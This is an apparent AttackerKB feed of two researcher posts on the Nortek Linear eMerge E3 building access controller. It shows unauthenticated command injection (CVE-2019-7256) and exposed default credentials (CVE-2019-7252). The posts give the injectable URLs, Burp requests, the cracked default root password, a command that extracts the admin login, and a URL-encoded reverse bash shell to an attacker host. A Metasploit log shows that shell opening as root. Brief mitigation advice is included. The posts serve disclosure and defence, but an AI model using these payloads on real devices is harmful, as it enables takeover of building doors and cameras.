Activity Feed

In my article cve-2019-7256 at attackerkb.com, I already elaborated on the security risks and vulnerabilities that still exists on the Linear eMerge E3 access controller.
Beside the RCE vulnerabilities, also default credentials exist within the vulnerable configuration that can be easily leveraged to gain privileged access to the system.

There are two significant vulnerabilities:
The first one is based on a default root password that is a stored in the /etc/passwd and is available on the vulnerable configuration. This can be used to escalate to root privileges using the RCE vulnerability CVE-2019-7256 or use these credentials in combination with ssh (if enabled) to get root access to the access controller.
The second credential vulnerability allows an unauthenticated malicious actor to obtain the web credentials for user admin from the spider database that is accessible and readable for the world on the access controller. With this access, the malicious actor is able to control the Linear eMerge E3 access platform, the access to building and its cameras and the authority to manage the access rights of users.

Lets quickly demonstrate both vulnerabilities…

We assume that we have already gained access to the system using the RCE described in CVE-2019-7256

ls -l /etc/passwd
-rwxr--r--    1 e3user   linear         733 Nov 13  2012 /etc/passwd
cat /etc/passwd
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh

AS you can see is the default root password hash stored directly in /etc/passwd and readable for world. Normally, these password hashes are stored in a /etc/shadow file that is only readable for root. With this configuration, It is very easy to retrieve the hash and run a password dictionary or brute force attack with for instance hashcat to retrieve the password. And do not worry, somebody did this job already in 2019 ;–) –> davestyle.

To test if the root default password is available…

echo davestyle | su -c whoami
root

The second credential vulnerability can be exploited by querying the spider access controller database which has the user and password information stored in clear text.

This database resides in /tmp/SpiderDB/Spider.db and with the command below you can very easily retrieve the admin web credentials.

grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID
ID='admin',Password='xxxxxxx'

And if this is not successful, you can always try the default web credential setting admin:admin

Another Metasploit module to test the availability of the default root password and leak the admin web credentials has been submitted to the Metasploit mainstream.

Mitigation

Change the default root password on your access controller.
Update your Linear eMerge E3 access controller to a higher version then 1.00-06.

References

Nortek Linear eMerge E3-Series 1.00-06 Multiple Vulnerabilities
Packet storm

Credits

Credits goes to the security researcher below who discovered these vulnerabilities.
Gjoko ‘LiquidWorm’ Krstic

Building Automation and Access Control systems are at the heart of many critical infrastructures, and their security is vital. Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems in an entire building – potentially causing physical damage, introducing safety risks or financial repercussions.

In one of the recent security engagements, we stumbled across a Nortek Linear eMerge E3 Access Controller managing all the building and camera access. It was exposed to the Internet for remote management on port 80 and we soon figured out that it was vulnerable.

And guess what, these vulnerabilities were already discovered in 2019 by Gjoko Krstic a.k.a LiquidWorm from Applied Risk. He published a paper AR2019005 that demonstrated a raft of critical vulnerabilities that exists on these Building Access Control Systems.
Nortek Security & Control, LLC (NSC) , the manufacturer of these Access Controls Systems is a leader in wireless security, home automation and personal safety systems and devices.
They claim that the eMerge E3-Series embedded browser-based network appliance platform makes advanced security technology reliable and affordable for any entry-level access control application.

Well, forget the words advanced security and reliable because it is pretty tragic to see that the majority of these Linear eMerge E3 access controllers (around 3500 listed in Shodan) are still vulnerable in 2022 and impose a huge security risk on the organizations using these devices for their physical and logical security.

Recently Nice, a global manufacturer of smart home, security and building automation solutions, announced the acquisition of Nortek and let’s hope that this will improve the quality of their security products.

Now let’s demonstrate on how vulnerable this platform is and bare in mind that this platform is responsible for building and camera access and therefore a prime target for malicious actors.

Within the Linear eMerge E3 access controller, several endpoints are vulnerable to a remote command injection (RCE).

• http://HOST:PORT/card_scan_decoder.php?No=30&door=%60<CMD>%60
  
• http://HOST:PORT/card_scan.php?No=30&ReaderNo=%60<CMD>%60
  
• http://HOST:PORT/card_scan.php?No=1337&ReaderNo=%60<CMD>%60&CardFormatNo=1337
  

You can easily demonstrate this with burpsuite crafting a request, using the sleep command or create a test file with the command whoami > cuckoo.txt which then can be access through the web interface.

Burp request

GET /card_scan_decoder.php?No=30&door=%60sleep+10%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response which will take around 10 seconds…

HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.23
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 03 Dec 2022 04:53:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=utf-8
Connection: close
Date: Sat, 03 Dec 2022 04:53:32 GMT
Server: lighttpd/1.4.22
Content-Length: 67

{"raw":false,"card_format_default":"","total_bit":null,"data":null}

Example with whoami command

Burp request

GET /card_scan_decoder.php?No=30&door=%60whoami+>cuckoo.txt%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Get cuckoo.txt

GET /cuckoo.txt HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2943015055"
Last-Modified: Sat, 03 Dec 2022 05:02:15 GMT
Content-Length: 9
Connection: close
Date: Sat, 03 Dec 2022 05:07:06 GMT
Server: lighttpd/1.4.22

lighttpd

This is already pretty interesting for malicious actors to pursue, but there is more to it.
The lighttpd user is restricted to execute certain commands due a restricted busybox implementation, so it is difficult to get a real reverse shell or meterpreter session established which gives full control on the server.

Well, do not worry, our Nortek friends also decided to implement a default root password on the access controller which easily can be picked from etc/password.
Yes, you red it right, /etc/password with read rights for the world instead of using /etc/shadow (see my analysis on CVE-2019-7252 for more info).
This password has already been hacked in 2019 and can be used to escalate privileges and get a root shell or meterpreter session.

Let’s show a quick example how we spawn a root shell…

First generate a payload with msfvenom

# msfvenom -p cmd/unix/reverse_bash LHOST=<ATTACKER> LPORT=<PORT> -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes
bash -c '0<&74-;exec 74<>/dev/tcp/<ATTACKER>/<PORT>;sh <&74 >&74 2>&74'

Next step is to create the payload using the default root password davestyle
payload: echo davestyle | su -c "bash -c '0<&74-;exec 74<>/dev/tcp/<ATTACKER>/<PORT>;sh <&74 >&74 2>&74'"

Apply URL encoding to make it work in your burp request and start a multi/handler with the reverse_bash payload , <ATTACKER> and <PORT> settings in msf.
URL encode payload: %60echo+davestyle+%7C+su+-c+%22bash+-c+%270%3C%2674-%3Bexec+74%3C%3E%2Fdev%2Ftcp%2F<ATTACKER>%2F<PORT>%3Bsh+%3C%2674+%3E%2674+2%3E%2674%27%22%60

Burp request

GET /card_scan_decoder.php?No=30&door=%60echo+davestyle+%7C+su+-c+%22bash+-c+%270%3C%2674-%3Bexec+74%3C%3E%2Fdev%2Ftcp%2F<ATTACKER>%2F<PORT>%3Bsh+%3C%2674+%3E%2674+2%3E%2674%27%22%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Metasploit handler

msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on <ATTACKER>:<PORT>
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (127.0.0.1:<PORT> -> 127.0.0.1:48944) at 2022-12-03 11:42:27 +0000

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

whoami
root
ls -l /etc/passwd
-rwxr--r--    1 e3user   linear         733 Nov 13  2012 /etc/passwd
cat /etc/passwd
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh

The example above show that it is pretty simple to weaponize and therefore there is a high probability of exploitation in the wild.
I have created a Metasploit module that has been submitted to the Metasploit mainstream.

Mitigation

Please update your Linear eMerge E3 access controller to a higher version then 1.00-06.

References

Nortek Linear eMerge E3-Series 1.00-06 Multiple Vulnerabilities
Packet storm
Metasploit module

Credits

Credits goes to the security researcher below who discovered these vulnerabilities.
Gjoko ‘LiquidWorm’ Krstic